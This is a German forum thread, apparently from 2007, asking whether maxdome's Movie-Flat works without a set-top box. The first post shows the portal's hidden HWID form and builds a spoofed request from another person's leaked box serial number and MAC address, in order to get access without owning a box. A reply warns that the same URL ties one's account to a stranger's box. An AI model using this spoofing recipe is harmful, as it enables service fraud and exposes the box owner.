Maxdome Movie-Flat Auch Ohne Set-Top Box?

Padarox

Neuer User
Mitglied seit
15 Apr 2007
Beiträge
2
Punkte für Reaktionen
0
Punkte
0
Ich habe mir vor kurzem auch die Thomson STB zugelegt. Ist ein schickes Teil, kann man ja schliesslich viel mit machen ;)

Ich fing allerdings an mich zu fragen, wie maxdome denn bitte prüfen will, ob dem jeweiligen Account eine Movie-Flat zusteht...
(Ich habe die Box gebraucht gekauft und hatte es sofort in meinem Account)
Nun, da dachte ich mir, muss es doch ne Möglichkeit geben die maxdome n00bs auszutricksen.

1. Nahm ich mir die Links vor, die man in den Foren schon findet:
Link hatten ja schon mehrere gepostet, näher darauf eingegangen ist bisher aber niemand. Also sah ich mir mal den Quelltext genauer an... Und stieß auf die folgenden Daten:
Code:
[...]
<form action="http://service.maxdome.de/de/cgi/g.fcgi/entertainment/vod/stb/hwid" method="post" name="hwid" id="hwid">
    <input type="hidden" name="sid" value="babhdci.1176596978.12840.pd55xpp8h4.70.gbh" />
    <input type="hidden" name="stbSerialNumber" id="stb_serialnumber" value="" />
    <input type="hidden" name="stbModelNumber" id="stb_modelnumber" value="" />
    <input type="hidden" name="stbVendorId" id="stb_vendorid" value="" />
    <input type="hidden" name="stbOsVersion" id="stb_osversion" value="" />
    <input type="hidden" name="stbClientVersion" id="stb_clientversion" value="" />
    <input type="hidden" name="stbPicVersion" id="stb_picversion" value="" />
    <input type="hidden" name="stbRomVersion" id="stb_romversion" value="" />
    <input type="hidden" name="stbActivationTime" id="stb_activationtime" value="" />
    <input type="hidden" name="stbMacAddress" id="stb_macaddress" value="" />
    <input type="hidden" name="stbExtFeatures" id="stb_extfeatures" value="" />
  </form>
[...]
Nunja, es handelt sich hierbei um den Quelltext der SetTop Box wird geprüft Seite... Und was sie so alles abfragt...

2. Ok, versuchst du mal eine Abfrage zustande zu bekommen, die das Script glücklich macht... Aber woher die Daten nehmen? Von der eigenen Box? Nein das geht einfacher...
Und fand das Thomson Wiki... Also dachte ich mir, nutzt du mal die Angaben aus dem Logfile des Wiki (Link) und fand die wget Zeile mit dem Link:
Code:
[...]
FLEXLOADER - HTTP: 
 
Get(https://stbupdate.streamingmxd.de/getbootcfg.asp?HW=01.01&Model=IP1101PC&Rom=28.03&IRPic=01.09&FPAPic=06.03&OS=38.04&App=48.02&Mac=00:10:95:7D:B0:0B&SN=9A052G351910N0&ATime=2006-11-20 00:08) - 
 
RC: 0, Sts: 0, HTTP: 1, Retries: 5, Size: 138
[...]
Ahja, irgendwie dumm diese Daten so zu veröffentlichen... Ein Zugang ist damit für alle die ein wenig Kenntnisse haben Möglich! Wie? Lest weiter...

3. Mann wandle die Wikidaten um und passe sie in die Portal-Abfrage ein:
http://service.maxdome.de/de/cgi/g.fcgi/entertainment/vod/stb/hwid/?sid=babhdci.1176596978.12840.pd55xpp8h4.70.gbh&stbSerialNumber=9A052G351910N0&stbModelNumber=IP1101PC&stbOsVersion=38.04&stbPicVersion=06.03&stbRomVersion=28.03&stbActivationTime=2006-11-20&stbMacAddress=00:10:95:7D:B0:0B
Wem auch immer diese persönlichen SetTop Box Daten gehören, dank ihm wäre es für alle möglich sich Zugang zum maxdome Portal zu verschaffen, ohne sich eine SetTop Box anschaffen zu müssen - Vllt ja sogar noch die Routine der Movie-Flat zu umgehen...
Schlechter Schutz von maxdome und vllt Probleme für den Besitzer dieser einen STB... Warum?
Stellt euch folgendes Szenario vor:
- 1&1 hätte beim Kauf die SN mit den Käuferdaten zusammen gespeichert
- maxdome speichert Benutzerzugriffe anhand der SN
- irgendwann merkten sie, das 100 PC's auf einmal die SN nutzen
- Käufer bekommt "nette Post"
- ...

Will hier nicht auf illegalen Mist hinweisen, sondern euch nur aufzeigen welche Gefahr eine Veröffentlichung eurer Log Files haben könnte, wenn ihr nicht genau bedenkt was da alles drin steht und wofür es verwendet werden könnte ;)
Nicht das ihr auch eure Daten veröffentlicht, wie Catfood2k im Wiki ;)
 
Zuletzt bearbeitet:
https://stbupdate.streamingmxd.de/getbootcfg.asp?HW=01.01&Model=IP1101PC&Rom=28.03&IRPic=01.09&FPAPic=06.03&OS=38.04&App=48.02&Mac=##:##:##:##:##:##&SN=##SCHLECHTWENNHIEREINEFREMDESNSTEHT##&ATime=2006-11-20 00:08

ACHTUNG

Beim Aufruf dieser URI werden deine Zugangsdaten "auf der" Box des anderen Users Gespeichert (genaugenommnen auf den Maxdomeservern;)

Es ist somit Möglich; mittels deinen Zugangsdaten auf deine Rechnung Kostenpflichtige Inhalte abzurufen.

Also vorher die Seriennummer und MAC an die eigene STB anpassen (somit macht das dann nur noch Sinn, wenn man nicht Ständig die Handynummer für das AVS neu Eintippen will;)

Falls du diesen Link bereits benutzt hast, Lösche schnellstmöglichst deine Zugangsdaten-Verknüpfung von dieser Box.


http://maxdomeservice.1und1.de/de/cgi/g.fcgi/entertainment/vod/1und1/config/stb?sid=fingerwegvonmeinersessionid
 
Zuletzt bearbeitet:
ezbyiv, bitte änder Dein Posting dahingehend, dass nicht das gesamtes Posting in Großschrift (=Schreien!) erscheint. Um einzelne Wörter zu betonen, nimm die "Bold"-Funktion, und / oder Farbe. Aber bitte nicht so.
Die Flut an Satzendezeichen kannst Du bei dieser Gelegenheit auch wieder löschen, die sind hier unnötig.
 
Holen Sie sich 3CX - völlig kostenlos!
Verbinden Sie Ihr Team und Ihre Kunden Telefonie Livechat Videokonferenzen

Gehostet oder selbst-verwaltet. Für bis zu 10 Nutzer dauerhaft kostenlos. Keine Kreditkartendetails erforderlich. Ohne Risiko testen.

3CX
Für diese E-Mail-Adresse besteht bereits ein 3CX-Konto. Sie werden zum Kundenportal weitergeleitet, wo Sie sich anmelden oder Ihr Passwort zurücksetzen können, falls Sie dieses vergessen haben.